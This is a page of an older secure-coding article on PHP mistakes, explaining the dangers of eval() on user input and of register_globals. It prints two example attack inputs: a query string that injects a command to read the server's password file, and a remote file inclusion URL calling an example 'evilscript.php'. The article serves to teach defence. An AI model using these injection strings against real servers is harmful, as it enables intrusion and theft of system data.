Administration
AJAX
Apache
BrainDump
DHTML
Flash
Java
JavaScript
Multimedia
MySQL
Oracle
Perl
PHP
Practices
Python
Reviews
Security
Style-Sheets
Web Services
XML
Zend
Zope

Forums Sitemap
IBM® developerWorks
Sun Developer Network

Dedicated Servers
E-Commerce Hosting
Linux Web Hosting
Managed Hosting
Small Business Hosting
Actuate Whitepapers
VeriSign Whitepapers
VPS Hosting

Weekly Newsletter
Developer Updates
Free Website Content

Articles

Forums

All Feeds

Write For Us Get Paid

Request Media Kit

Site Map

Privacy Policy
Support

USERNAME

PASSWORD

>>> SIGN UP!

Lost Password?

PHP

RSS

PHP Security Mistakes

By: Dave Clark	Search For More Articles! Disclaimer Author Terms
Rating: / 286
2004-06-09

Table of Contents:

PHP Security Mistakes

Tips 2, 3

Tip 4

Tips 5, 6

	ADD THIS ARTICLE TO:
	Del.ici.ous	Digg
	Blink	Simpy
	Google	Spurl
	Y! MyWeb	Furl

Email Me Similar Content When Posted

Add Developer Shed Article Feed To Your Site

Email Article To Friend

Print Version Of Article

PDF Version Of Article

ADVERTISEMENT

Stay one step ahead of the competition. Evaluate and give feedback on some of the hottest web development tools on the market today. Make your opinion heard! Click Here

PHP Security Mistakes - Tips 2, 3

(Page 2 of 4 )

2. Be careful with eval()

Placing user-inputted values into the eval() function can be extremely dangerous. You essentially give the malicious user the ability to execute any command he or she wishes! You may envision the input coming from a drop-down menu of options you specify, but you user may decide to send input like this:

script.php?input=;passthru("cat /etc/paswd");

By putting his own code in that statement, the user could cause your program to output your server's complete /etc/passwd file.

Use eval() sparingly, and by all means, validate the input. It should only be used when absolutely necessary -- when there is dynamically generated PHP code. If you are using it to substitute template variables into a string or substitute user-inputted values, then you are using it for the wrong reason. Try sprintf() or a template system instead.

3. Be careful when using register_globals = ON

This has been a major issue since this feature was invented. It was originally designed to make programming in PHP easier (and that it did), but misuse of it often led to security holes. As of PHP 4.2.0, register_globals is set to OFF by default. It is recommended that you use the superglobals to deal with input ($_GET, $_POST, $_COOKIE, $_SESSION, etc).

For example, let us say that you had a variable that specified what page to include:

include($page);

but you intended $page to be defined in a config file or somewhere else in the script, and not to come as user input. In one instance you forgot to pre-define $page. If register_globals is set to ON, the malicious user can take over and define $page for you, by calling your script like this:

script.php?page=http://www.example.com/evilscript.php

I recommend you develop with register_globals set to OFF, and use the superglobals when accessing user input. In addition, you should always develop with full error reporting, which can be specified like this (at the top of your script):

error_reporting(E_ALL);

This way, you will receive a notice for every variable you try to call that was not previously defined. Yes, PHP does not require you to define variables so there may be notices that you can ignore, but this will help you to catch undefined variables that you did expect to come from input or other sources. In the previous example, when $page was referenced in the include() statement, PHP would issue a notice that $page was not defined.

Whether or not you want to use register_globals is up to you, but make sure you are aware of the advantages and disadvantages of it and how to remedy the possible security holes.

Next: Tip 4 >>